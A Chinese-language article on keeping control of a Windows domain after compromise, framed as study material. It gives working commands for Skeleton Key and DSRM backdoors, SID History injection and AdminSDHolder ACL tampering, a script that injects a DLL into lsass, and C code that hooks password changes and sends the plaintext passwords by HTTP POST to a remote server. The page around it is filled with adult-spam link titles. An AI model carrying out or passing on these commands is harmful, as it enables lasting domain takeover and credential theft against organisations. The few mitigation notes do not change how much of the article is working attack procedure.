精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

常見域后門技術總結與分析利用

安全 應用安全
重新編譯生成 HookPasswordChange.dll 并注入 lsass.exe 進程,當管理員修改密碼時,將通過 HTTP POST 方法將用戶密碼外帶到遠程服務器。

0x00 前言

當獲取到域控的權限后,為了防止對域控權限的丟失,hacker 也會使用一些技術來維持已獲取到的域權限。因此,本文對常見的域后門技術進行了總結并對其利用方式進行了詳細的說明,希望可以對大家的學習提供一些幫助。

0x01 創建 Skeleton Key 域后門

Skeleton Key 即 “萬能鑰匙”。通過在域控上安裝 Skeleton Key,所有域用戶賬戶都可以使用一個相同的密碼進行認證,同時原有密碼仍然有效。

該技術通過注入 lsass.exe 進程實現,并且創建的 Skeleton Key 只是保存在內存中,域控只要重啟,Skeleton Key 就會失效。

注意:利用該技術需要擁有域管理員的權限

1. 常規利用

將 Mimikatz 上傳到域控制器,執行以下命令:

mimikatz.exe "privilege::debug" "misc::skeleton" exit

1677855624_64020b8802aaddfbe458a.png!small?1677855625171

執行后,將成功創建 Skeleton Key 域后門,為所有的域賬戶設置一個相同的密碼 “mimikatz”,從而使其他機器可以成功登錄域控。

1677855655_64020ba74f83423085d79.png!small?1677855657028

2. 緩解措施

微軟在 2014 年 3 月添加了 LSA(Local Security Authority,本地安全機構)保護策略,用來防止對 lsass.exe 進程的內存讀取和代碼注入。通過執行以下命令,可以開啟或關閉 LSA 保護。

# 開啟 LSA 保護策略
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
# 關閉 LSA 保護策略
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL

開啟LSA 保護策略并重啟系統后,Mimikatz 的相關操作都會失敗。此時即使已經獲取了 Debug 權限也無法讀取用戶哈希值,更無法安裝 Skeleton Key。

1677855699_64020bd3074458e27bad8.png!small?1677855700052

不過,Mimikatz 可以繞過 LSA 保護。該功能需要 Minikatz 項目中的 mimidrv.sys 驅動文件,相應的 Skeleton Key 安裝命令也變為了如下:

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton

1677855726_64020beea2aeb6ecfcab2.png!small?1677855727480

1677855735_64020bf73b9afa573d07b.png!small?1677855736348

1677855741_64020bfdd1a670f697d5e.png!small?1677855743196

0x02 創建 DSRM 域后門

DSRM(Directory Services Restore Mode,目錄服務還原模式)是域控的安全模式啟動選項,用于使服務器脫機,以進行緊急維護。在初期安裝 Windows 域服務時,安裝向導會提示用戶設置 DSRM 的管理員密碼。有了該密碼后,網絡管理員可以在后期域控發生問題時修復、還原或重建活動目錄數據庫。

在域控上,DSRM 賬戶實際上就是本地管理員賬戶(Administrator),并且該賬戶的密碼在創建后幾乎很少使用。通過在域控上運行 NTDSUtil,可以為 DSRM 賬戶修改密碼,相關命令如下:

# 進入 ntdsutil
ntdsutil
# 進入設置 DSRM 賬戶密碼設置模式
set dsrm password
# 在當前域控上恢復 DSRM 密碼
reset password on server null
# 輸入新密碼 123456Lhz!
<password>
# 再次輸入新密碼
<password>
# 退出 DSRM 密碼設置模式
q
# 退出 ntdsutil
q

1677855788_64020c2c3518b8a7f297e.png!small?1677855789258

hacker 可以通過修改 DSRM 賬戶的密碼,以維持對域控的權限。

該技術適用于 Windows Server 2008 及以后版本的服務器,并需要擁有域管理員的權限

利用過程:

① 執行以下命令,通過 Mimikatz 讀取域控的 SAM 文件,獲取 DSRM 賬戶的哈希值。

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

1677855855_64020c6f885ab57bb7e18.png!small?1677855856478

② 修改 DSRM 賬戶的登錄模式,以允許該賬戶遠程登錄。可以通過編輯注冊表的DsrmAdminLogonBehavior 鍵值來實現,可選用的登錄模式有以下3種:

0:默認值,只有當域控制器重啟并進入 DSRM 模式時,才可以使用 DSRM 管理員賬號。

1:只有當本地 AD DS 服務停止時,才可以使用 DSRM 管理員賬號登錄域控制器。

2:在任何情況下,都可以使用 DSRM 管理員賬號登錄域控制器。

執行以下命令,將 DSRM 的登錄模式改為 “2”,允許 DSRM 賬戶在任何情況下都可以登錄域控。

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f

1677855927_64020cb74d1db693969c2.png!small?1677855928243

1677855935_64020cbf9e464565547c9.png!small?1677855936718

③ 這時,hacker 就可以通過 DSRM 賬戶對域控制器進行控制了。

執行以下命令,使用 DSRM 賬戶對域控執行哈希傳遞攻擊并成功獲取域控權限:

1677856010_64020d0a3a1c30055b1bf.png!small?1677856012262

0x03 SID History 的利用

1. SID & SID History

在 Windows 系統中,SID(Security Identifiers)是指安全標識符,是用戶、用戶組或其他安全主體的唯一、不可變標識符。

Windows 根據 ACL(訪問控制列表)授予或拒絕對資源的訪問和特權,ACL 使用 SID 來唯一標識用戶及其組成員身份。當用戶登錄到計算機時,會生成一個訪問令牌,其中包含用戶和組 SID 和用戶權限級別。當用戶請求訪問資源時,將根據 ACL 檢查訪問令牌以允許或拒絕對特定對象的特定操作。

如果將賬戶刪除,然后使用相同的名字創建另一個賬戶,那么新賬戶不會具有前一個賬戶的特權或訪問權限,這是因為兩個賬戶的 SID 不同。

SID History 是一個支持域遷移方案的屬性,使得一個賬戶的訪問權限可以有效地克隆到另一個賬戶,這在域遷移過程中非常有用。例如,當 Domain A 中的用戶遷移到 Domain B 時,會在 Domain B 中新創建一個賬號。此時,將 Domain A 用戶的 SID 添加到 Domain B 的用戶賬戶的 SID History 屬性中。這就確保了 Domain B 用戶仍然擁有訪問 Domain A 中資源的權限。

2. 利用方法

在實戰中,hacker 可以將域管理員用戶的 SID 添加到其他域用戶的 SID History 屬性中,以此建立一個隱蔽的域后門。

利用該技術需要擁有域管理員權限

下面在域控制器(Win 2012)上進行實操:

在 Windows Server 2019 上進行測試時可能會報錯

① 創建域用戶 Alice

1677856153_64020d998bb30b3d42191.png!small?1677856154572

② 向域控制器上傳 Mimikatz,并執行以下命令,將域管理員 Administrator 的 SID 添加到域用戶 Alice 的 SID History 屬性中:

# mimikatz版本大于2.1.0
mimikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:Alice /new:Administrator" exit
# mimikatz版本小于2.1.0
mimikatz.exe "privilege::debug" "misc::addsid Alice ADSAdministrator" exit

1677856182_64020db65efecec7e8ed6.png!small?1677856183294

③ 通過 Powershell 查看 Alice 用戶的屬性,可以發現其 SID History 屬性值已經與 Administrator 用戶的 SID 相同,這說明 Alice 用戶將繼承 Administrator 用戶的所有權限。

Import-Module ActiveDirectory
Get-ADUser hack -Properties SIDHistory

1677856241_64020df1b2d6170e247f3.png!small?1677856242847

④ 通過 Alice 用戶連接域控,執行 “whoami /priv” 命令,可以看到該用戶擁有域管理員的所有特權。

1677856267_64020e0b72b30cad82184.png!small?1677856268890

0x04 利用 AdminSDHolder 打造域后門

1. AdminSDHolder

AdminSDHolder 是一個特殊的 Active Directory 容器對象,位于 Domain NC 的 System 容器下。

1677856322_64020e42e821c73b7b937.png!small?1677856324129

AdminSDHolder 通常作為系統中某些受保護對象的安全模板,以防止這些對象遭受惡意修改或濫用。

受保護對象通常包括系統的特權用戶和重要的組,如 Administrator、Domain Admins、Enterprise Admins 以及 Schema Admins 等。

在活動目錄中,屬性 adminCount 用來標記特權用戶和組。對于特權用戶和組來說,該屬性值被設為 1。

1677856391_64020e87b25c85ba4d583.png!small?1677856392876

通過 ADFind 查詢 adminCount 屬性設置為 1 的對象,可以找到所有受 AdminSDHolder 保護的特權用戶和組。

# 枚舉受保護的用戶
Adfind.exe -b "dc=hack-my,dc=com" -f "&(objectcategory=person)(samaccountname=*)(admincount=1)" -dn
# 枚舉受保護的組
Adfind.exe -b "dc=hack-my,dc=com" -f "&(objectcategory=group)(admincount=1)" -dn

1677856413_64020e9d4116293fc5a72.png!small?1677856414499

在默認情況下,系統將定期(每60分鐘)檢查受保護對象的安全描述符,將受保護對象的 ACL 與 AdminSDHolder 容器的 ACL 進行比較,如果二者不一致,系統就會將受保護對象的 ACL 強制修改為 AdminSDHolder 容器的 ACL。該工作通過 SDProp 進程來完成,該進程以 60 分鐘為一個工作周期。

2. 利用方法

在實戰中,hacker 可以篡改 AdminSDHolder 容器的 ACL 配置。當系統調用 SDProp 進程執行相關工作時,被篡改的 ACL 配置將同步到受保護的 ACL 中,以此建立一個隱蔽的域后門。

利用該技術需要擁有域管理員權限

執行以下命令,通過 PowerView 向 AdminSDHolder 容器對象添加一個 ACL,使普通域用戶 Alice 擁有對 AdminSDHolder 的 “完全控制” 權限。

Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=hack-my,DC=com" -PrincipalIdentity Alice -Rights All -Verbose

1677856502_64020ef67370ecfc31194.png!small?1677856503572

執行后,Alice 用戶成功擁有 AdminSDHolder 容器對象的完全控制權限

1677856538_64020f1a98d816695dec2.png!small?1677856540619

等待 60 分鐘后,Alice 用戶將獲得對系統中的特權用戶和組完全控制權限。

1677856562_64020f3228c509ac2630a.png!small?1677856563694

此時,Alice 用戶可成功向 Domain Admins 等關鍵用戶組內添加成員。

1677856575_64020f3f109e856c4e0e4.png!small?1677856575944

如果清除 Alice 用戶對 AdminSDHolder 的完全控制權限,可以執行以下命令:

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=hack-my,DC=com" -PrincipalIdentity Alice -Rights All -Verbose

1677856599_64020f57ba464ceaf8cf6.png!small?1677856600783

3. 改變 SDProp 的工作周期

方法1:修改注冊表

hacker 也可以通過注冊表手動修改 SDProp 進程的工作周期,以縮短等待的時長(最小值1分鐘,最大值2小時)。該注冊表需要慎重修改, 當修改的頻率變高時,CPU處理LSASS的開銷也就越大,這很容易導致系統變得卡頓,該注冊表鍵默認是不存在的。

# 工作周期修改為 1 分鐘,鍵值以秒為單位
reg add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60

1677856642_64020f82928537b94bf14.png!small?1677856643483

方法2:強制 SDProp 執行

① 運行 Ldp.exe(C:\Windows\System32\Ldp.exe)

1677856675_64020fa348b66ece4c152.png!small?1677856676232

② 點擊連接 -> 連接,輸入當前機器的機器名或IP,端口默認為 389

1677856686_64020faee360b0725ebbe.png!small?1677856687858

③ 點擊連接 -> 綁定,選擇綁定為當前登錄的用戶

1677856696_64020fb8c8c425bfc8516.png!small?1677856697688

④ 在修改窗口這里針對不同版本的域控制器有不同的情況:

當域控為Windows Server 2008時,點擊瀏覽 -> 修改,在屬性選項卡中輸入 FixUpInheritance ,在值字段輸入 yes。操作選擇添加,然后點擊輸入,最后運行即可。

1677856773_64021005c23fdd242ecd7.png!small?1677856774816

當域控為Windows Server 2008 R2或Windows Server 2012及以上時,點擊瀏覽 -> 修改,在屬性選項卡中輸入 RunProtectAdminGroupsTask ,在值字段輸入 1。操作選擇添加,然后點擊輸入,最后運行即可。

1677856797_6402101d608bafefb1f28.png!small?1677856798539

0x05 HOOK PasswordChangeNotify

PasswordChangeNotify 在微軟官方文檔中的名稱為 PsamPasswordNotificationRoutine,是一個 Windows API。當用戶重置密碼時,Windows 會先檢查新密碼是否符合復雜性要求,如果密碼符合要求,LSA 會調用 PasswordChangeNotify 函數在系統中同步密碼。該函數的語法如下:

PSAM_PASSWORD_NOTIFICATION_ROUTINE PsamPasswordNotificationRoutine;
NTSTATUS PsamPasswordNotificationRoutine(
[in] PUNICODE_STRING UserName,
[in] ULONG RelativeId,
[in] PUNICODE_STRING NewPassword
)
{...}

當調用 PasswordChangeNotify 時,用戶名和密碼將以明文的形式傳入。hacker 可以通過 Hook 技術,劫持 PasswordChangeNotify 函數的執行流程,從而獲取傳入的明文密碼。

下面進行演示:

① 生成 DLL 文件,需在項目屬性中將MFC的使用設為 ”在靜態庫中使用MFC“

1677856909_6402108dec14a7bc470c9.png!small?1677856911091

1677856928_640210a0a2a4dc28f62be.png!small?1677856929599

1677856933_640210a5a74a3d4b1470d.png!small?1677856934603

② 將編譯好的 HookPasswordChange.dll 和 Invoke-ReflectivePEInjection.ps1 上傳到域控制器,并通過 Invoke-ReflectivePEInjection.ps1 將 HookPasswordChange.dll 注入 lsass.exe 進程。

# 導入 Invoke-ReflectivePEInjection.ps1
Import-Module .\Invoke-ReflectivePEInjection.ps1
# 讀取 HookPasswordChange.dll 并將其注入 lsass 進程
$PEBytes = [IO.File]::ReadAllBytes('C:\HookPasswordChange.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass

1677856975_640210cfe276ad796701d.png!small?1677856976892

建議在 Windows Server 2012 上進行測試,Window Server 2019 親測運行腳本會報錯

③ 當管理員修改密碼時,用戶的新密碼將記錄在 c:\windows\temp 目錄的 password.txt 文件中。

1677857005_640210ed94dbfa64f20c1.png!small?1677857006588

此外,password.txt 文件的保存路徑可以自定義,需要在 HookPasswordChange.cpp 文件中修改

1677857022_640210feae86594520b7c.png!small?1677857023871

我們還可以在源碼的基礎上通過 WinINet API 添加一個簡單的 HTTP 請求功能,將獲取到的用戶密碼傳回遠程服務器,相關代碼如下:

// 需要包含 --> #incloud <WinInet.h>
HINTERNET hInternet = InternetOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (hInternet == NULL)
{
InternetCloseHandle(hInternet);
}
HINTERNET hSession = InternetConnect(hInternet, L"192.168.220.132", 6666, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);

if (hSession == NULL)
{
InternetCloseHandle(hSession);
InternetCloseHandle(hInternet);
}

char strUserName[128];
char strPassword[128];
WideCharToMultiByte(CP_ACP, 0, userName, -1, strUserName, sizeof(strUserName), NULL, NULL);
WideCharToMultiByte(CP_ACP, 0, password, -1, strPassword, sizeof(strPassword), NULL, NULL);
char Credential[128];
snprintf(Credential, sizeof(Credential), "username=%s&password=%s", strUserName, strPassword);
HINTERNET hRequest = HttpOpenRequest(hSession, L"POST", L"/", NULL, NULL, NULL, 0, 0);
TCHAR ContentType[] = L"Content-Type: application/x-www-form-urlencoded";
HttpAddRequestHeaders(hRequest, ContentType, -1, HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE);
HttpSendRequest(hRequest, NULL, 0, Credential, strlen(Credential));

重新編譯生成 HookPasswordChange.dll 并注入 lsass.exe 進程,當管理員修改密碼時,將通過 HTTP POST 方法將用戶密碼外帶到遠程服務器。

1677857383_6402126737861bb31ccfd.png!small?1677857384304

加入HTTP 請求功能后重新編譯時,如果出現報錯:無法解析的外部符合 _imp_XXXXX,可以參考:??解決方案??

0x06 總結

本文僅僅只對常見的域后門技術進行了總結,希望可以對大家的學習有幫助。如有不對,歡迎指正。

本文作者:LHzzzzz, 轉載請注明來自????

責任編輯:武曉燕 來源: FreeBuf.COM??
相關推薦

2011-03-30 10:53:45

2009-09-27 10:02:11

2013-06-19 10:03:42

2013-08-09 09:50:34

2010-09-13 15:26:34

2024-04-17 08:00:00

2009-09-23 17:52:16

Hibernate概念Hibernate常見

2011-02-22 17:14:20

2019-02-26 14:39:20

Windows后門漏洞

2014-04-30 09:09:16

2011-09-19 16:11:55

沖突域廣播域局域網

2013-07-09 16:12:47

2009-09-07 11:25:25

2021-03-22 16:39:12

惡意軟件XcodeMac

2022-04-27 15:55:40

黑客漏洞網絡攻擊

2010-01-14 20:57:59

2010-01-15 10:32:40

2013-10-21 11:37:03

騰達Tenda路由器

2012-02-01 17:38:09

2016-02-25 11:02:11

點贊
收藏

51CTO技術棧公眾號

一区二区三区国产好| 少妇性bbb搡bbb爽爽爽欧美| 天天做天天爱天天综合网| 欧美一区二区三区四区高清| 欧美日韩不卡在线视频| 九色在线观看| 国产精品自产自拍| 日本精品视频网站| 91在线播放观看| 亚洲国产欧美日韩在线观看第一区| 欧美三片在线视频观看| 激情成人开心网| 三级做a全过程在线观看| 久久99精品久久久久久| 91成人免费观看网站| av最新在线观看| 欧美绝顶高潮抽搐喷水合集| 欧美高清视频不卡网| 国内性生活视频| 羞羞网站在线免费观看| 国产欧美一区二区精品久导航| 97国产超碰| 伊人精品一区二区三区| 亚洲激情不卡| 欧美精品亚州精品| 亚洲欧美另类日本| 国产欧美久久一区二区三区| 精品久久人人做人人爽| 国产九九热视频| 电影一区二区三区| 亚洲成av人在线观看| 欧美一级免费在线观看| jizz亚洲| 日本一区二区综合亚洲| 美国av一区二区三区| 国产 日韩 欧美 综合| 九九久久精品视频| 国产精品视频一| 国产黄色免费视频| 香蕉久久夜色精品国产| 97国产精品久久| 精品视频在线观看免费| 欧美不卡视频| 欧美精品免费播放| 欧美交换国产一区内射| 欧美激情视频一区二区三区在线播放| 中文字幕国产日韩| 鲁丝一区二区三区| 国产精品午夜一区二区三区| 日韩电影中文字幕| 97人妻天天摸天天爽天天| 粉嫩的18在线观看极品精品| 精品女同一区二区| 97人妻精品一区二区三区免费| 精品国产一区二| 欧美一区二区女人| a级大片免费看| 亚洲三区欧美一区国产二区| 亚洲精品一区二区三区蜜桃下载 | 日本午夜激情视频| 1234区中文字幕在线观看| 亚洲第一搞黄网站| 国产精品网站免费| 最新欧美色图| 在线观看一区二区精品视频| 国产精品视频黄色| 国产资源一区| 欧美一二三区在线观看| 日韩大尺度视频| 日本韩国欧美超级黄在线观看| 精品一区二区三区三区| 微拍福利一区二区| 91影院成人| 欧美日本亚洲视频| 日本午夜小视频| 老司机精品久久| 国产日韩在线播放| 午夜精品久久久久久久99老熟妇| 岛国一区二区在线观看| 精品日产一区2区三区黄免费| 黄色在线小视频| 国产精品嫩草影院av蜜臀| 久久视频免费在线| 国产精品一二三产区| 在线看国产日韩| 992kp免费看片| 免费萌白酱国产一区二区三区| 亚洲人午夜色婷婷| 国产精品国产精品88| 99精品福利视频| 国产欧美va欧美va香蕉在线| 亚洲精品国偷拍自产在线观看蜜桃| 91在线视频观看| 一级做a爰片久久| 91桃色在线观看| 欧美日韩亚洲国产综合| 9.1在线观看免费| 你微笑时很美电视剧整集高清不卡| 精品国偷自产在线视频| www.av麻豆| 精品一区二区国语对白| 另类欧美小说| 任你弄在线视频免费观看| 日韩欧中文字幕| 日本r级电影在线观看| 亚洲三级网页| 欧美黄色性视频| 中文字幕 欧美激情| av午夜精品一区二区三区| 亚洲一区二区四区| jizz内谢中国亚洲jizz| 日韩欧美在线影院| 黄大色黄女片18免费| av成人黄色| 147欧美人体大胆444| 成人精品一区二区三区校园激情| 亚洲国产视频一区| 亚洲精品成人在线播放| 国产99久久精品一区二区300| 久久久久国产视频| 国产精品视频无码| 国产精品国产三级国产aⅴ原创| 1024av视频| 中文久久电影小说| 久久精品福利视频| 一区二区三区麻豆| 久久久久久久网| 国产91在线免费| 都市激情亚洲| 国内外成人免费激情在线视频网站| 91久久久久国产一区二区| 国产日韩欧美电影| 成人在线观看黄| 亚洲裸色大胆大尺寸艺术写真| 久久久久久av| 黄色aaa大片| 亚洲国产美国国产综合一区二区| 在线免费看v片| 香蕉精品视频在线观看| 国产日产欧美a一级在线| 国产在线观看免费| 欧美午夜片在线免费观看| 美女扒开腿免费视频| 国内精品99| 国产高清不卡av| 成人在线高清免费| 亚洲国产精品va| 亚洲男人第一av| 91免费在线播放| 免费黄色日本网站| 日日天天久久| 国产精品高潮粉嫩av| 国产毛片在线| 欧美在线免费观看视频| 国产肥白大熟妇bbbb视频| 日本人妖一区二区| 一级二级三级欧美| 亚洲精品高潮| 97超碰蝌蚪网人人做人人爽 | 91亚洲精华国产精华精华液| www.av中文字幕| 网曝91综合精品门事件在线| 日韩av不卡在线| av影片在线看| 在线播放中文字幕一区| 国产精品九九九九九九| 成人午夜激情视频| 日本在线观看a| 91一区二区| www.成人av| 深夜成人在线| 色香阁99久久精品久久久| 国产精品-色哟哟| 性久久久久久久久| 国产一二三四区在线| 国产尤物一区二区在线| 日韩国产一级片| 国产欧美日韩视频在线| 成人春色激情网| 免费h视频在线观看| 国产一级揄自揄精品视频| 国产精品无码久久久久成人app| 一区二区三区欧美在线观看| 巨胸大乳www视频免费观看| 奇米影视一区二区三区小说| 日韩中文字幕在线不卡| 奇米777国产一区国产二区| 国产精品精品一区二区三区午夜版 | 日韩精品欧美大片| 国产一区二中文字幕在线看| 欧美1—12sexvideos| 亚洲午夜精品久久久久久性色 | 国产成人小视频| 毛片av免费在线观看| 欧美激情成人在线| 日韩.欧美.亚洲| 一区二区中文字幕在线观看| 国产z一区二区三区| 人人超在线公开视频| 国产午夜精品视频免费不卡69堂| 国产高清视频免费观看| 欧美主播一区二区三区| 国产一级视频在线播放| 欧美激情在线一区二区| 青青草视频网站| 国产原创一区二区三区| 三年中国国语在线播放免费| 亚洲一本视频| 国产日本欧美在线| 欧美亚洲在线日韩| 麻豆一区区三区四区产品精品蜜桃| 榴莲视频成人app| 国产精品亚洲自拍| 韩日精品一区二区| 久久久久久一区二区三区| 米奇精品一区二区三区| 亚洲色图13p| 日本高清视频在线| 日韩欧美一级片| 91亚洲精品国偷拍自产在线观看 | 久久久免费高清电视剧观看| 在线中文资源天堂| 亚洲色图第一页| 亚洲av成人精品日韩在线播放| 日韩欧美在线影院| 99久久精品无免国产免费| 欧美日本在线观看| 特级西西444www高清大视频| 欧美日韩中文字幕| 免费观看一区二区三区毛片| 亚洲一二三四区| 九九视频在线观看| 一区二区三区日本| 激情小说中文字幕| 一区二区在线观看免费| 国产大片免费看| 18成人在线视频| 希岛爱理中文字幕| 亚洲欧洲日韩在线| 亚洲人做受高潮| 亚洲欧美一区二区在线观看| 娇小11一12╳yⅹ╳毛片| 中文字幕在线观看不卡| 天堂av免费在线| 国产精品久久久一区麻豆最新章节| 国产综合精品久久久久成人av| 久久久久综合网| 亚洲精品色午夜无码专区日韩| 久久久九九九九| 91成人精品一区二区| 国产精品妹子av| 亚洲人做受高潮| 伊人夜夜躁av伊人久久| 久久影院一区二区| 婷婷夜色潮精品综合在线| 可以免费看的av毛片| 日本韩国欧美在线| 国产黄色免费视频| 在线播放国产精品二区一二区四区| 国产美女三级无套内谢| 欧美mv日韩mv| 日韩欧美电影在线观看| 国产亚洲精品久久久优势| 午夜老司机在线观看| 九色精品免费永久在线| caoporn-草棚在线视频最| 26uuu亚洲伊人春色| 四虎4545www国产精品| 91亚洲午夜在线| 国产精品丝袜在线播放| 欧美日本韩国国产| 天堂网在线观看国产精品| 精品国产一区二区三区无码| 亚洲综合日本| 怡红院亚洲色图| 成人av网站在线观看| 国产肥白大熟妇bbbb视频| 国产精品灌醉下药二区| 精品视频久久久久| 欧美在线小视频| 亚洲狼人综合网| 亚洲香蕉成视频在线观看| 97超碰资源站在线观看| 欧美一区二区视频97| 日韩一区二区三区四区五区| 国产精品加勒比| 欧美日韩一二三四| 91动漫在线看| 免费成人在线网站| 国产精品手机在线观看| 国产精品女上位| 天天操天天摸天天干| 91麻豆精品久久久久蜜臀| 天天舔天天干天天操| 久久精品视频播放| 中文字幕在线视频久| 成人在线中文字幕| 在线一级成人| 成人免费在线网| 久久精品国产秦先生| 大地资源二中文在线影视观看| 国产精品电影院| 无码免费一区二区三区| 精品国内二区三区| 黄av在线播放| 国产精品欧美激情在线播放| 免费萌白酱国产一区二区三区| 国产卡一卡二在线| 秋霞午夜av一区二区三区| 国产chinese中国hdxxxx| 亚洲天堂av一区| 最新国产中文字幕| 亚洲欧美国产视频| xxx性欧美| 98国产高清一区| 小说区亚洲自拍另类图片专区 | 国产成年人免费视频| 欧美精品日韩一区| 国产小视频福利在线| 欧美又大粗又爽又黄大片视频| 亚洲码欧美码一区二区三区| 在线观看一区欧美| 免费一区二区视频| 老头老太做爰xxx视频| 日韩欧美中文免费| 四虎精品成人影院观看地址| 国内伊人久久久久久网站视频 | 美日韩精品免费观看视频| 日本在线啊啊| 国精产品99永久一区一区| 欧美激情亚洲| 亚洲精品一区二区18漫画| 国产精品三级av| 日本丰满少妇做爰爽爽| 亚洲精品一区二三区不卡| 欧美女人交a| 国产精品网址在线| 免费一区二区| aⅴ在线免费观看| 黄色网页网址在线免费| 日本精品视频在线观看| 视频免费一区二区| av动漫在线播放| 国产成人亚洲综合a∨猫咪| 欧美精品99久久久| 精品福利av导航| wwwww亚洲| 精品一区二区三区自拍图片区 | 日本xxxxx18| 国产精品综合av一区二区国产馆| 成人一级黄色大片| 中文字幕欧美日韩va免费视频| 丰满岳乱妇国产精品一区| 久久九九国产精品怡红院 | 国色天香一区二区| 秘密基地免费观看完整版中文| 亚洲午夜电影在线观看| 手机看片福利在线| 51ⅴ精品国产91久久久久久| 日韩精选在线观看| 亚洲最新av在线| 国产福利91精品一区二区| 亚洲一区二区在线看| 国产在线国偷精品产拍免费yy| 18岁成人毛片| 欧美videossexotv100| 免费在线中文字幕| 蜜桃传媒一区二区| 日本人妖一区二区| 唐朝av高清盛宴| 亚洲精品在线网站| 吉吉日韩欧美| 在线观看视频黄色| 99国产精品久久久久| 中文字幕av久久爽| 精品中文字幕在线观看| 欧美一区 二区| 日本久久久久久久久久久久| 亚洲欧美日韩精品久久久久| 免费av网站观看| 国产精品海角社区在线观看| 欧美福利在线| 欧美丰满美乳xxⅹ高潮www| 欧美一区二区三区视频在线| 久久青草伊人| 在线天堂一区av电影| 99精品视频在线播放观看| 一级二级三级视频| 午夜精品久久17c| 欧美第一精品| 中文字幕5566| 91精品国产丝袜白色高跟鞋| 亚洲精品成人图区| 国产91porn| 久久久久久一二三区| www久久久久久| 国产精品视频26uuu| 亚洲区国产区| 久久精品一区二区三区四区五区| 日韩电视剧在线观看免费网站|